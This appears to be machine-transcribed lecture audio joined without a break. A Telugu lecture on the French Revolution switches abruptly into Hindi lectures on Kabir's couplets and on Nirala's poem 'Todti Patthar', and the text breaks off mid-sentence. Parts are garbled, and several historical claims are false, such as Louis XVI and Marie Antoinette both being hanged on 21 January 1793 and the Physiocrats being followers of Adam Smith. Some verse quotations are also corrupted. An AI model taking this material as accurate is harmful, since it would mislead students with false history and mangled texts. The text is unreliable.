వరుసగా ఈ ఆర్థిక మంత్రులందరినీ తొలగిస్తూ వచ్చాడు. ఆర్థిక మంత్రులు ప్రధాన నెక్కర్ చెప్పాడు. ఏం చెప్పాడు? భూస్వాములపైన పన్నులు ఎక్కువగా విధించండి, వాళ్ళ ద్వారానే ఎక్కువగా ఆదాయం సమకూర్చుకుంటే నెక్కర్ను పదవీ భ్రష్ట చేయడం జరిగింది. మీరు చూస్తారు వర్సేల్స్ అనే అద్దాల భవనం. ఈ అద్దాల భవనం ఎలాంటిదంటే, ఈ అద్దాల భవనాన్ని చూస్తే మొత్తం ఐరోపా చక్రవర్తులు అసూయ చెందేవాళ్ళంట. అంత గొప్ప అద్దాల భవనాన్ని కట్టించాడంట 14వ లూయి. దీనిలో దాదాపుగా 3,000 మంది దాసీదాసులు పనిచేసేవాళ్ళంట. కాబట్టి దీన్ని మనం చూడొచ్చు. అంటే దీన్ని మెయింటైన్ చేయడానికి ఎన్ని వందల కోట్ల రూపాయలు కావాలో మనం అర్థం చేసుకోవచ్చు. కానీ ఇవన్నీ ఆర్థిక దుస్థితి ఉన్నా కూడా దాన్ని చక్కదిద్దడానికి ప్రయత్నించకపోగా ప్రజలపైనే పన్నుల భారం వేయడం అనేది మనం చూస్తాం. అలాగే ఎలాగైతే అమెరికా దేశంలో ఫిలాసఫర్స్ ఉన్నారో ఈ దేశంలో కూడా వైజ్ఞానికవేత్తలు, రచయితలు కూడా ప్రధానంగా ఫ్రాన్స్ సమాజాన్ని బాగా వీళ్ళు ప్రభావితం చేశారు. వోల్టేర్, రూసో, మాంటెస్కో. వోల్టేర్ అనే వ్యక్తిని విప్లవంలో సగభాగం అంటాం. ఇతడు అంటాడు, ఇతడు వాస్తవంగా
దేవుణ్ణి నమ్ముతాడు, నాస్తికవాది కాదు. అయినా ఏమన్నాడంటే బైబిల్ లాంటి మత గ్రంథాలను విశ్వసించవద్దండి, దాంట్లో ఉండేవన్నీ కూడా అభూత కల్పనలే, అవన్నీ అద్భుతాలు తప్ప ఇంకేవీ కాదు, మనం నమ్మాల్సింది దేవుణ్ణి కానీ దైవ గ్రంథాలను కాదు అని చెప్పేసి బహిరంగ ప్రకటించిన వాడు వోల్టేర్. అందుకే వోల్టేర్ని ఏమంటారంటే విప్లవంలో సగభాగం అన్నారు. ప్రజలకు ఎక్కువగా అయిన నిరంకుశ రాజరికాన్ని సమర్థించినప్పటికీ ప్రజల హక్కులను కూడా మాట్లాడిన వ్యక్తి వోల్టేర్. రెండవవాడు రూసో. రూసో వ్రాసిన సోషల్ కాంట్రాక్ట్. రూసో వ్రాసిన సోషల్ కాంట్రాక్ట్ అనే ఒక గొప్ప గ్రంథము ఆ రోజు ఫ్రెంచ్ విప్లవానికి బైబిల్ లాంటిది. దీనిలో చెప్పాడు, మ్యాన్ ఈజ్ బర్న్ ఫ్రీ బట్ ఎవ్రీవేర్ ఇన్ చైన్స్. మానవుడు స్వేచ్ఛాజీవి కానీ సర్వత్రా సంఖ్యలతో బంధించబడి ఉన్నాడు. మానవుడు ప్రాకృతిక వ్యవస్థలో చాలా స్వేచ్ఛగా ఉండేవాడు, కానీ రాజ్యము రాజరికం వచ్చేసి వీళ్ళని శృంఖలాబద్ధులుగా చేసింది. అందుకే ఈ స్వేచ్ఛను తెంపుకోవడానికి ప్రతి ఒక్కరూ ప్రయత్నించాలని చెప్పేసి ప్రజా సార్వభౌమాధికారాన్ని ప్రచురించిన వాడు రూసో, జీన్ జాక్విస్ రూసో అనే ఆయన. ఇక మూడోవాడు మాంటెస్కో. మాంటెస్కో వ్రాసినటువంటి ద స్పిరిట్ ఆఫ్ లాస్ అనే గ్రంథం, అంటే అధికార విభజన సిద్ధాంతంలో ఈయన ఎలాగైతే ఇంగ్లాండ్ దేశంలో శాసన కార్య న్యాయశాఖలు ఎలాగైతే పనిచేస్తున్నాయో అదే విధానము ఫ్రాన్స్ దేశంలో కూడా ఉంటే బాగుంటుంది, లేదా ప్రపంచ దేశాల్లో కూడా ఈ విధానం ఉంటే బాగుంటుందని చెప్పేసి మాంటెస్కో ద స్పిరిట్ ఆఫ్ లాస్ అనే గ్రంథంలో రాశాడు. అంటే న్యాయశాఖ కానీ లేదా కార్యనిర్వాహక శాఖ కానీ శాసనశాఖ కానీ వేటికవే రాజరికానికి అనుకూలం కాకుండా స్వేచ్ఛగా పనిచేయాలని ప్రకటించిన వాడు మాంటెస్కో. అలాగే డేవిస్ డిడిరో అనే వ్యక్తి కూడా ఈయన కూడా ప్రధానంగా ఎన్సైక్లోపీడియా అనే గ్రంథాన్ని వ్రాయడం జరిగింది. అట్లాగే ఆ రోజుల్లో వైజ్ఞానిక తత్వవేత్తలే కాకుండా ఆర్థిక సూత్రాలు ప్రతిపాదించిన ఆర్థికవేత్తలు కూడా ఉన్నారు. వాళ్ళని ఏమంటామంటే మనం ఫిజియోక్రాట్స్ అంటాం. వాళ్ళు గొప్పగా పేరుగాంచిన వాళ్ళు ఫాన్సు వాక్విస్ కానీ మార్కుస్ డిగుర్నేలు, వీళ్ళు ప్రధానంగా ఆడమ్ స్మిత్ యొక్క అనుచరులు. ఆడమ్ స్మిత్ను మనం తెలుసుకుంటాం, వాళ్ళకి ఫాదర్ ఆఫ్ ఎకనామిక్స్గా పేర్కొంటాం మనం. ఆడమ్ స్మిత్ రాసినటువంటి ద వెల్త్ ఆఫ్ నేషన్స్ అనే గ్రంథం అనేది ప్రధానంగా చాలా గొప్ప విషయం. ఇది సహజ సంపదతో మానవ కృషి జోడించినప్పుడే సంపద ఉత్పన్నమవుతుందని చెప్పేసి ఈయన చెప్పాడు. ఇటువంటి సమయంలో ఫ్రాన్స్ పార్లమెంటును సమావేశపరచాలని 16వ లూయి భావించాడు. గత 175 సంవత్సరాలుగా ఫ్రాన్స్ పార్లమెంటు సమావేశం కాలేదు, కానీ 1789 మే 5వ తారీఖున సమావేశమైంది. ఈ అనేక మంది ప్రముఖులు వచ్చారు. ఈ ప్రముఖులు కోరింది ఏంటంటే ఈ ఎస్టేట్ జనరల్లో 3 ఉన్నాయి, ఫస్ట్ ఎస్టేట్, సెకండ్ ఎస్టేట్, థర్డ్ ఎస్టేట్ అని. ఫస్ట్ ఎస్టేట్లో మతాచారులు, రెండవ ఎస్టేట్లో ప్రధానంగా భూస్వాములు, మూడవ ఎస్టేట్లో మధ్యతరగతి వర్గం ఉంది. ఈ ముగ్గురు ఏం కోరారంటే ప్రతి ఒక్కరికి ఒక ఓటు ఉండాలని చెప్పేసి వాళ్ళు కోరారు. అయితే దానికి ఒప్పుకోలేదు 16వ లూయి కానీ భూస్వాములు కానీ మతాచారులు కానీ. అందుకే వీళ్ళు ఏం చేశారంటే జూన్ 20, 1789న టెన్నిస్ కోర్టు శపథం చేశారు. ఎస్టేట్ జనరల్ సమావేశాన్ని జరపకపోవడం వల్ల 16వ లూయికి వ్యతిరేకంగా 3వ ఎస్టేట్ సభ్యులు టెన్నిస్ కోర్టులో సమావేశమై ఫ్రాన్స్ దేశానికి రాజ్యాంగబద్ధ రాజరికం వచ్చే వరకు మేము పోరాటం చేస్తామని నినదించారు. జూన్ 20 తారీఖు 1789లో జరిగినటువంటి ఈ శపథం ఇది. అయితే దీనికి అనుకూలంగానే మనకు ఇక బాసిల్ కోట పతనం జరిగింది. 16వ లూయి ఏం చేశాడంటే టెన్నిస్ కోర్టు శపథంలో వీరు చేసినటువంటి ఈ ప్రకటన అట్లాగే వీళ్ళు జాతీయ సభగా ప్రకటించుకొని జాతీయ రాజ్యాంగ పరిషత్తును ఏర్పాటు చేసుకోవాలని భావించారు. అంటే దేశానికి ఒక రాజ్యాంగాన్ని రాసుకోవాలని చెప్పేసి భావించిన వాళ్ళు 3వ ఎస్టేట్ సభ్యులు లేదా జాతీయ సభ. దీన్ని అణచడానికి 16వ లూయి ప్రధానంగా గొప్ప పెద్ద సైన్యాన్ని ప్యారిస్కి తీసుకొని రావడం జరిగింది. ఆ రోజున ఆర్థిక మంత్రిని నెక్కర్ను కూడా తొలగించారు. ఇది ప్రజలకు ఆగ్రహాన్ని తెప్పించింది. వాళ్ళు ఏమనుకున్నారంటే 3వ ఎస్టేట్ను అణచివేయడానికే పూనుకుంటున్నాడు 16వ లూయి, ఆర్థిక మంత్రిని కూడా తొలగించాడు, ఇక కాబట్టి మనం విప్లవాన్ని ఇక పూనుకోవాలని చెప్పేసి ప్రజలు భావించారు. దీనితో ప్రజలు తమ దొరికిన ఆయుధాలన్నీ తీసుకొని బాసిల్ కోటను ముట్టడించి విప్లవాన్ని ప్రారంభించారు. జూలై 14, 1789 ఫ్రాన్స్ చరిత్రలోనే కాదు ప్రపంచ చరిత్రలోనే ఒక గొప్ప సంఘటన. సామాన్య ప్రజలు, మధ్యతరగతి వర్గం రాజరికానికి వ్యతిరేకంగా వీళ్ళు ఒక యుద్ధం ప్రారంభించి బాసిల్ కోటను ముట్టడించారు. బాసిల్ కోటను పడగొట్టి అక్కడుండే యుద్ధ ఖైదీలను విడిపించి యుద్ధాన్ని
ప్రకటించారు. ఇక ఈ దేశానికి రాజ్యాంగబద్ధ రాజరికమే కావాలని చెప్పేసి నినదించారు. బ్యాసిల్ కోట పతనంతో 16వ లూయి ప్రధానంగా రాజ్యాంగ సభకు, జాతీయ సభకు అధికారాలు ఇచ్చాడు. జాతీయ రాజ్యాంగ పరిషత్తు రాజ్యాంగాన్ని తయారు చేసుకోవడానికి అనుమతి ఇచ్చాడు. దీనితో ఫ్రాన్స్ దేశంలో విప్లవం విజయవంతమైంది. ఇది రక్తపాతం ద్వారా విజయవంతమైంది. అక్కడ రాజరికం రద్దయి రిపబ్లిక్ వ్యవస్థ ఏర్పడింది. సెప్టెంబర్ 22, 1792లో ఫ్రాన్స్ దేశం మొదటి రిపబ్లిక్గా అవతరించింది. మనకు తెలుసు రిపబ్లిక్ అంటే మనకు తెలుసు దేశాధినేత ప్రజల చేత ప్రత్యక్షంగా కానీ పరోక్షంగా కానీ ఎన్నిక కావడం అనేది మనం గమనించాలి. ఆ విధంగా ఫ్రాన్స్లో మొదటిసారిగా రాచరికము రద్దై రిపబ్లిక్ ఏర్పాటు చేసుకుంది. స్వేచ్ఛ, సమానత్వము, సౌభ్రాతృత్వం ఏదైతే రూసో చెప్పాడో, ఏదైతే జాన్ లాక్ చెప్పాడో ఆ సిద్ధాంతాల ఆధారంగా ఫ్రాన్స్ విప్లవాన్ని వాళ్ళు రూపొందించుకున్నారు. భూస్వామ్య వ్యవస్థను రద్దు చేశారు. చర్చి ఆస్తులను కూడా వాళ్ళు మొత్తం కూడా రద్దు చేశారు. అలాగే ఈ మొదటి రిపబ్లిక్ కూడా ఇంకేం చేసిందంటే లూయిని కూడా ఉరితీసింది. జనవరి 21, 1793లో లూయిని ఉరితీసింది. అంటే ఏదైతే రాజరికానికి వీళ్ళు అనుకూలంగా ఉన్నారో 16వ లూయి భార్య మేరీ ఆంతోనెత్ ఇద్దరేం చేశారంటే ఫ్రాన్స్ దేశాన్ని వదిలి పారిపోవాలనుకున్నారు. ఎందుకంటే వీళ్ళు ఆస్ట్రియాకు బంధువులు. వీళ్ళు ఆమె ఆస్ట్రియా రాకుమార్తె మేరీ ఆంతోనెత్ వాళ్ళ సోదరుడు అక్కడ పరిపాలిస్తూ ఉన్నాడు. అందుకే వీళ్ళు ఉత్తరాలు రాశారు మమ్మల్ని రక్షించడని చెప్పేసి. వీళ్ళు పారిపోవాలని భావించారు. ఎవరెవరు? మేరీ ఆంతోనెత్ అలాగే 16వ లూయి పారిపోవాలని భావిస్తే వాళ్ళు ఏం చేశారంటే ఈ మొదటి రిపబ్లిక్ సభ్యులు పట్టుకొని వాళ్ళను జనవరి 21, 1793లో ఉరితీశారు. అలాగే ఆసియా రాకుమార్తె మేరీ ఆంతోనెత్ దీనికి చాలా బాధపడ్డది. అంతేగాక ఆమె ఆ రష్యా రాణికి ఉత్తరం రాసిందట. ఏమని? ఫ్రాన్స్లో ఉండే ప్రజలు ప్రధానంగా మమ్మల్ని చాలా ఇబ్బంది పెడుతున్నారు, ఏం చేయాలని ఈమె సలహా కోరిన ఆమె ఆస్ట్రియా రాకుమార్తె మేరీ ఆంతోనెత్. అప్పుడు రష్యా ఆమె ఒక సలహా ఇచ్చిందంట. ఏ దేశంలోనైనా ప్రజలు అరుస్తూ ఉంటారు. ఉదాహరణకి ఒకటి చెప్తా నేను. ఒక నిండు పున్నమి రోజు అడవిలో అర్ధరాత్రి చంద్రుడు వెళుతూ ఉంటే అక్కడ నక్కలు, తోడేలు అరుస్తుంటాయి, కానీ చంద్రుడు పట్టించుకుంటాడా అని చెప్పేసి. అలాగే మీ దేశంలో కూడా మీరు రాజులైన మీరు 16వ లూయి మేరీ ఆంతోనెత్లు పట్టించుకోకూడదని చెప్పేసి సలహా ఇచ్చిందంట రష్యా రాణి క్యాథరిన్. సరే, ఏమైనా ఈ మూడు విప్లవాలు ప్రపంచ గమనాన్ని మార్చిన విప్లవాలుగా ప్రసిద్ధిగాంచాయి. మొదటి విప్లవము ఇంగ్లాండ్ విప్లవము పార్లమెంటరీ విధానానికి నాంది పలికితే, అమెరికా విప్లవం లిఖిత రాజ్యాంగానికి నాంది పలికితే, ఫ్రాన్స్ విప్లవము స్వేచ్ఛ, సమానత్వము, సౌభ్రాతృత అనే భావాలను ప్రచారం చేసి ప్రపంచంలో విప్లవ భావాలను ప్రచారం చేసి రాబోయే విప్లవాలకు ఒక నాందిగా సూచిగా ఉన్న విప్లవమే ఫ్రాన్స్ విప్లవం. ఐరోపాలో ఏ రాజైనా సరే ఇక ప్రజాబద్ధంగా నిరుష్క పరిపాలిస్తే మేము ఇదిగో 16వ లూయి తలను మీకు చూపిస్తామని ప్రకటించిన ప్రజలే ఫ్రాన్స్ ప్రజలు. ఈ విధంగా విప్లవాలు ప్రపంచానికి ఒక మార్గాన్ని అందించాయి. ఇవి మనం గుర్తుంచుకోవాల్సిందిగా కోరుతున్నాను. सबका स्वागत है। आज का विषय साखी कबीरदास। कबीर 15वीं सदी के भारतीय रहस्यवादी कवि और संत थे। वे हिंदी साहित्य के भक्तकालीन युग में ज्ञानाश्रयी निर्गुण शाखा की काव्यधारा के प्रवर्तक थे। अपने जन्म के बारे में बहुत मतभेद प्रचलित है।
इस विषय को दृष्टि में रखकर कबीर की वाणी अपने शिष्यों ने इस प्रकार व्यक्त किया है। काशी में प्रगट भये रामानंद चेताए, मतलब उनका जन्म काशी से संबंधित है और उनका गुरु रामानंद। शिष्य ने उनकी वाणियों का संग्रह बीजक नाम के ग्रंथ में लिया, जिसके 3 मुख्य भाग है, साकी, सबद, रामायणी। कबीर की भाषाएं सदुकड़ी एवं पंचमेल खिचड़ी। कबीर का विचार। कबीर समाज सुधारक थे। वे हिंदू व इस्लाम धर्म आलोचक थे। उन्होंने सामाजिक अंधविश्वास की निंदा की और सामाजिक बुराइयों की सख्त आलोचना की थी। उनके जीवन काल के दौरान हिंदी और मुसलमान दोनों ने उन्हें अपने विचार के लिए धमकी दी थी। कबीर का राम निर्गुण, निराकार और निरंजन थे। वे मूर्ति पूजा का खंडन किया और हिंदू और मुसलमान धर्म के नाम पर बाह्य आडंबरों को ढोंग समझा। कबीर इस दोहे में जाति या वर्गभेद को खंडन करते हुए इस प्रकार बताया है। जाति न पूछो साधु की, पूछ लीजिए ज्ञान, मोल करो तलवार का, पड़ा रहने दो म्यान। स्वयं कबीर भी जाति व वर्गभेद का शिकार था, इसलिए उन्होंने अपने जीवन में जो अनुभव पाया है इसको दृष्टिकोण में रखकर इस प्रकार बताया है कि साधु का ज्ञान बहुत महत्वपूर्ण होता है, उनका जाति नहीं। इसलिए साधु का जाति के बारे में मत पूछो, उनके ज्ञान के बारे में ध्यान देना चाहिए। क्योंकि जब हम तलवार खरीदते समय क्या देखते हैं, उसकी धारा को ही परीक्षा करते हैं, म्यान का नहीं। इसलिए कबीर इस दोहे में जाति या वर्गभेद का खंडन इस प्रकार किया है। कबीर मूर्ति पूजा का भी खंडन इस प्रकार किया है। पाहन पूजे हरि मिले तो मैं पूजूं पहाड़, ताते या चाकी भली फीस काय संसार। पाहन पूजे हरि मिले, पत्थर की पूजा करने से अगर हमें भगवान मिल जाए तो मैं पूरा पहाड़ की पूजा करूँगा। मतलब कबीर ज्ञान में ही भगवान को देखता है। इसलिए इस प्रकार कहा है कि अचेतन मूर्ति से चक्की बलि है, इस प्रकार समझा है उन्होंने। इसलिए थाते या चक्की बलि, क्योंकि वो चक्की काम में आ जाती है, संसार के लिए आटा गूंद रहे हैं। इस प्रकार उन्होंने मूर्ति पूजा का खंडन किया है। धर्म के नाम पर बाह्याडंबरों को उन्होंने इस प्रकार खंडन किया है। केसरी कहाँ बिगाड़िया जो मूंडो सौबार, मन को कहे न मूंडिये जामे विषय विकार। हम भगवान के लिए हमारे केश चढ़ाते हैं, क्योंकि हमें जो पूरा सौंदर्य देने वाला केश ही है। इसलिए भगवान को चढ़ाकर हमारा पाप का परिहार समझते हैं। लेकिन कबीर की दृष्टि में दिखावा में कोई प्रभाव नहीं होता है। मन को मूंडना चाहिए। मन में काम, क्रोध, मद, लोभ जैसे विकारों को रखकर दिखावा से कोई फायदा नहीं होता है। जो मूंडे सौबार सिर मुंडाने से भी कोई फायदा नहीं होता है। इसलिए कबीर बाह्य आडंबरों को इस प्रकार उन्होंने खंडन किया है। इतना ही नहीं, साधु जिस प्रकार रहना चाहिए इसका विवरण उन्होंने इस दोहे में दिया है। साधु संबंधी विचार। साधु ऐसा चाहिए जैसा सूप सुभाए, सार सार तो गही रहे
थेता दे उड़ाए। साधु ऐसा चाहिए, साधु लोग ऐसा रहना चाहिए जैसा सूप सुभाए, सूप जैसा स्वभाव अपनाना चाहिए। सार सार तो गहरे हैं, केवल सार को ग्रहण कर निस्सार को छोड़ देना चाहिए। साधु लोगों का स्वभाव के बारे में कबीर का मत इस प्रकार है। और एक साधु संबंधी विचार उन्होंने इस प्रकार व्यक्त किया है। कबीरा संगत साधु की हरे और की व्याधि, संगत बुरी असाधु की आठों पहर उपाधि। साधु का महत्व उन्होंने इस प्रकार बताया है। कबीरा संगत साधु की हरे और की व्याधि, संगत बुरी असाधु की आठों पहर उपाधि। अगर हम साधु का सांगत्य करता है तो हमारी जो व्याधि है, हमें जो दुर्गुण है वो दूर हो जाता है। अगर असाधु का सांगत्य हम करता है तो क्या होता है, आठों पहर, 8 दिक से हमको जो नष्ट हो जाता है। इसलिए कबीर साधु की महिमा इस प्रकार यहाँ वर्णन किया है। गुरु की महिमा कबीर इस प्रकार बताया है। कबीरा सद्गुरु ना मिला रही अधूरी सीख, स्वांग जाति का परिहरी करी धरी धरी मांगई भीख। गुरु की महिमा, गुरु जब तक सद्गुरु नहीं मिलता है तब तक हमारी सीख अधूरी रहता है, मतलब हमारी पढ़ाई अधूरी रहता है। जब तक सद्गुरु मिलता है तब तक ही हमारी पढ़ाई पूरी होता है। अगर सद्गुरु न मिला तो क्या होता है, भीख मांग, घर घर ढूंढ ढूंढ कर भीख मांगने की व्यक्ति की जैसा हमारी स्थिति होती है। क्योंकि गुरु संबंधी कबीर गुरु कौन है, रामानंद मानते हैं, लेकिन कबीर का जन्म एक विधवा ब्राह्मण के स्त्री के गर्भ से पैदा हुआ है। इसलिए उस स्त्री ने लोकलाज की भय से कबीर को गंगा नदी के किनारे छोड़ दिया है। तब एक जुलाहे परिवार ने, दंपतों ने बालक कबीर का पालन और पोषण किया है। इसलिए कबीर का कोई सवर्ण की जो लक्षण कबीर में नहीं है, बाय बर्थ ब्राह्मण, बट उन्होंने अपना पालन और पोषण एक जुलाहे दंपतों ने किया है। इसलिए उन दिनों में जाति या वर्गभेद बहुत ज़्यादा है। रामानंद शिष्य के रूप में कबीर को नहीं स्वीकार लिया है। तब उन्होंने क्या किया, कबीर सद्गुरु की महिमा जानकर उन्होंने क्या किया, गंगा नदी के किनारे हर दिन रामानंद नहाने के लिए आया करता था। तब गंगा नदी के किनारे सीढ़ियों पर बैठकर जब रामानंद उस गंगा नदी से बाहर आते हैं तब उनको देखता रहता है। इस सिलसिले में रामानंद जी का जो पाँव का स्पर्श कबीर को मिला है। तब रामानंद ने ऑटोमेटिकली कहा है राम। इस राम शब्द को ही उनका गुरुपदेश मंत्र समझकर उन्होंने गुरु के रूप में स्वीकार किया है। इस प्रकार उन्होंने गुरु महिमा को अधिक प्राधान्यता देता है। और साधु संबंधी और एक विचार हम यहाँ देख सकते, संत न चांडो संतई कोटक मिला असंत, मल्य भुजंगम बेड़ियो शीतलता न तजंग। संत न चांडो संतई कोटक मिला ही असंत, मूल्यम भुजंगम बेड़ियो शीतलता न तजंग। जब तक हमारी असंत कोट मिलाने पर भी, करोड़ों असंत मिलाने पर भी संत का स्वभाव हमेशा अटल ही रहता है। संत स्वभाव जो होता है, संतों का स्वभाव कोई प्रभावित नहीं कर सकता है। करोड़ असंत लोगों से रहने पर भी उन्होंने अपने गुणों से
अटल रहता है। उदाहरण के लिए उन्होंने यहाँ दूसरा लाइन में बताया है, मल्य भुजंगम बेडियो शीतलता न तजंग। मल्य और भुजंगम, चंदन और सांप दोनों एक साथ रहता है, लपट कर रहता है, फिर भी दोनों अपने अपने गुणों से अटल रहता है। चंदन का शीतलता का स्वभाव भुजंग को नहीं आता, भुजंग का जो विषैली स्वभाव चंदन को नहीं आ जाती है। मतलब जो संत है, स्वाभाविक रूप से जो संत है, उनका गुण हमेशा अटल ही रहता है। और प्रेम का महत्व कबीर ने इस प्रकार बताया है, जब मैं था तब गुरु नहीं, अब गुरु है मैं नाही। प्रेम गली अति सांकरी, या दो न समाही। जब मैं था तब गुरु नहीं, अब गुरु है मैं नहीं। मतलब अहंभाव को हम छोड़ना चाहिए। अगर हमको प्यार चाहिए तो हम में जो ईगो होता है, अहम होता है, उसको छोड़ देना ही चाहिए। क्योंकि अगर हमको प्रेम चाहिए, प्रेम का रास्ता, प्रेम की गली अति सांकरी बताया है। मतलब बहुत संक्लिष्ट रास्ता है, बहुत संकरा रास्ता है। या में दोनों ना समाही, दोनों या प्रेम या अहम दोनों एक जगह नहीं रहता है। इसलिए हर व्यक्ति अगर प्रेम चाहता है तो अहम को छोड़ना चाहिए। लोक व्यवहार संबंधी और एक दोहा कबीर इस प्रकार यहाँ बताते हैं, निंदक निपरे रखिए आंगन कुटी छवाए, बिन पानी साबुन बिन निर्मल करे सुभाए। निंदक निपरे रखिए आंगन कुटी छवाए। जो व्यक्ति हमारा निंदा करता है हमेशा, उन लोगों से हम क्या करते हैं, नेचुरली उनसे दूर रहते हैं। लेकिन ज्ञानी कबीर हम लोगों को यहाँ एक सलाह दे रहे हैं, जो हमारे निंदा करता है उन लोगों को हमारे पास ही रखना चाहिए। आंगन कुटी छवाए, हमारे आंगन में ही, आंगन के पास ही उनकी कुटी होना अच्छा होता है। क्योंकि इसका लाभ उन्होंने दूसरा लाइन में बताता है कि वो लोग क्या करता है, बिन पानी साबुन बिन निर्मल करे सुभाए। वो लोग हमको क्या करता है, पानी के बिना, साबुन के बिना हमको मलरहित करता है। हमें जो दोष है, हमें जो गलतियां हैं, उन्होंने हमेशा आरोप करता रहता है। तब क्या होता है, इनडायरेक्टली हम में जो गलतियां हैं उसको सुधारने का वो मौका देता है। इसलिए निंदक क्या होता है, दूसरा रूप से हमारा मित्र हो जाता है। कि इनके साथ साथ और एक दोहा यहाँ हम देखते हैं, प्रेम का महत्व इस प्रकार बताया है कबीर ने, जा गट प्रेम न संचरे सो गट जान मसान, जैसा काल लोहार की सांस लेते बिन प्राण। जा गट प्रेम न संचरे सो गट जान मसान, जैसा काल लोहार की सांस लेते बिन प्राण। जिसके घट में प्रेम का संचार नहीं होता है वह स्मशान के समान है। मतलब जिस व्यक्ति में प्रेम नहीं होता है वह खाल लोहार की समान है। वह सांस लेते हैं लेकिन वह क्या है, वह शव के समान है। इसलिए प्रेम हमारे जीवन में इतना महत्वपूर्ण रोल प्ले करती है। इसलिए हम सब लोग प्रेम का महत्व को जानकर हम आगे बढ़ना चाहिए। इस प्रकार हम कबीर का दोहे हम अध्ययन कर सकते हैं। और अभ्यसनार्थ इस पाठ से लघु प्रश्न आते हैं। संदर्भ सहित व्याख्या के रूप में इन 10 दोहों में किसी एक दोहे आ जाती है। और अति लघु प्रश्न के रूप में कबीर का जो परिचय, कबीर का आलोचना या कबीर का विचारधारा, इसके बारे में
अति लघु प्रश्न आ जाते। सूर्यकांत त्रिपाठी निराला जी का तोड़ती पत्थर कविता। सूर्यकांत त्रिपाठी निराला जी हिंदी कविता के छायावादी युग के 4 प्रमुख स्तंभों में से एक माने जाते हैं। उनके पिता पंडित राय सहाय तिवारी उन्नाव के रहने वाले थे और महिषादल में सिपाही की नौकरी करते थे। निराला की शिक्षा हाई स्कूल तक हुई। बाद में हिंदी, संस्कृत और बांग्ला का स्वतंत्र अध्ययन किया। जीवन की सबसे विशेष बात यह है कि कठिन से कठिन परिस्थितियों में भी उन्होंने सिद्धांत त्याग कर समझौते का रास्ता नहीं अपनाया, संघर्ष का साहस नहीं गंवाया। जीवन का उत्तरार्ध इलाहाबाद में बीता। वही दरियागंज में उन्होंने अपनी यह लीला समाप्त की। आपका काव्य संग्रह अनामिका, परिमला, गीतिका, अनामिका द्वितीय भाग, तुलसीदास, कुकुरमत्ता आदि। उपन्यास अप्सरा, अलका, प्रभावती, निरुपमा, कुल्ली भाट आदि। कहानी संग्रह लिली, सखी, शुक्ल की बीवी, छतरी चमार, देवी आदि। निबंध आलोचन रविंद्रनाथ कविता कानन, प्रबंध पद्म, प्रबंध प्रतिमा आदि। तोड़ती पत्थर कविता इन 4-5 बिंदुओं के आधार पर हम अध्ययन कर सकते हैं। पहला है पत्थर तोड़ने वाली एक मजदूरिन स्त्री का वर्णन। दूसरा है स्त्री के सौंदर्य का वर्णन। तीसरा है आर्थिक सामाजिक विषमता का शिकार स्त्री का वर्णन। प्राकृतिक विषमता का स्त्री का वर्णन। स्त्री का मूक वेदना और स्त्री की व्यवस्था का वर्णन। पहले हम यहाँ यह देखते हैं कि वह तोड़ती पत्थर, देखा उसे मैंने इलाहाबाद के पथ पर। वह तोड़ती पत्थर, नहीं छायादार पेड़, वह जिसके तले बैठी हुई स्वीकार। वह तोड़ती पत्थर, देखा उसे मैंने इलाहाबाद के पथ पर। वह तोड़ती पत्थर, नहीं छायादार पेड़, वह जिसके तले बैठी हुई स्वीकार। पत्थर तोड़ने वाली एक मजदूरनी स्त्री का वर्णन उन्होंने इस प्रकार किया है। स्त्री का सौंदर्य का वर्णन। श्याम तन बर बांधा यौवन, नत नयन प्रिय कर्मरत मन। स्त्री का सौंदर्य इस प्रकार कर रहे हैं कि जब लेखक इलाहाबाद जाते समय सड़क के किनारे उन्होंने एक युवती को देखा है, वो पत्थर तोड़ रही है, नहीं छायादार पेड़ के नीचे। उनका सौंदर्य इस प्रकार है। श्याम तन बर बांधा यौवन, नत नयन प्रिय कर्मरत मन। उनका शरीर काला है और यवनवती भी है। उनका नयन झुका हुआ है क्योंकि आर्थिक विषमता के कारण। फिर भी उन्होंने डिग्निटी ऑफ लेबर को दिखाते हुए अपने काम में बहुत लगाव से लगा हुआ है। आर्थिक सामाजिक विषमता का शिकार का स्त्री रूप हम यहाँ देखते हैं। गुरु हथौड़ा हाथ करती बार बार प्रहार, सामने तरु मालिका अट्टालिका प्राकार। गुरु हथौड़ा हाथ करती बार बार प्रहार, सामने तरु मालिका अट्टालिका प्राकार। उन्होंने एक हथौड़ा को हाथ में लेकर पत्थर तोड़ रहे हैं। सामने उपवन, बाग बगीचे और सुंदर भवन भी है, लेकिन उसका छाया या उसमें प्रवेश उनमें नहीं है, लेकिन इसके निर्माण में वह भागीदार है। इस प्रकार उन्होंने यहाँ वर्णन किया है। और यहाँ देखिए प्राकृतिक विषमता का शिकार एक स्त्री का वर्णन। चढ़ रही थी धूप गर्मियों के दिन, दिवा का तमतमाता रूप, उठी झुलसाती हुई लू।
रुई जो जलती हुई बू गर्द चिनगी छा गई, प्रायः हुई दोपहर वह तोड़ती पत्थर। छिड़ रही थी धूप गर्मियों के दिन, दिवा का तमतमाता रूप उठी झुलसाती हुई लू। रुई जो जलती हुई बू गर्द चिनगी छा गई, प्रायः हुई दोपहर वह पत्थर तोड़ रही है। हॉट समर के कारण चारों ओर धूप छाया हुआ है, दोपहर भी हो गया है, फिर भी उन्होंने अपने काम में मस्त है। वह जिस पेड़ के नीचे पत्थर तोड़ रही है वह छायादार भी नहीं है, अर्थात वह खुली धूप में बैठी थी। सारी जमीन रुई की भांति तप रही थी, धूप में उसके शरीर को धूली के कण चिंगारे की तरह जमा हो गए। दोपहर भी हो गई लेकिन वह अपने काम में मस्त है। गर्मियों के दिन थे और चारों ओर लू चल रही थी। एक नारी की व्यवस्था हम इन पंक्तियों में हम देखते हैं। देखा मुझे उस दृष्टि से जो मार खा रोई नहीं, सजा सहज सितार सुनी मैं वह नहीं जो थी सुनी झंकार। देखा मुझे उस दृष्टि से जो मार खा रोई नहीं, सजा सहज सितार सुनी मैं वह नहीं जो थी सुनी झंकार। उन्होंने इस पत्थर तोड़ने वाली स्त्री को उन्होंने एक बार देखा है, उन्होंने इस प्रकार अपने काम में मस्त है। पत्थर तोड़ते तोड़ते एक बार कवि की ओर भी देखा है। यहाँ श्रमैक सौंदर्य का साकार रूप कवि यहाँ हमारे सामने प्रस्तुत करते हैं। सजा सहज सितार बताकर उस पत्थर तोड़ने वाली स्त्री का जो श्रम सौंदर्य का वर्णन यहाँ अनुप्रास अलंकार के द्वारा हमारे सामने प्रस्तुत किया है। और अंत में मूक वेदना का वर्णन, स्त्री की मूक वेदना आर्थिक विषमता के कारण, सामाजिक विषमता के कारण, प्राकृतिक विषमता के कारण उन्होंने जिस प्रकार मूक वेदना का 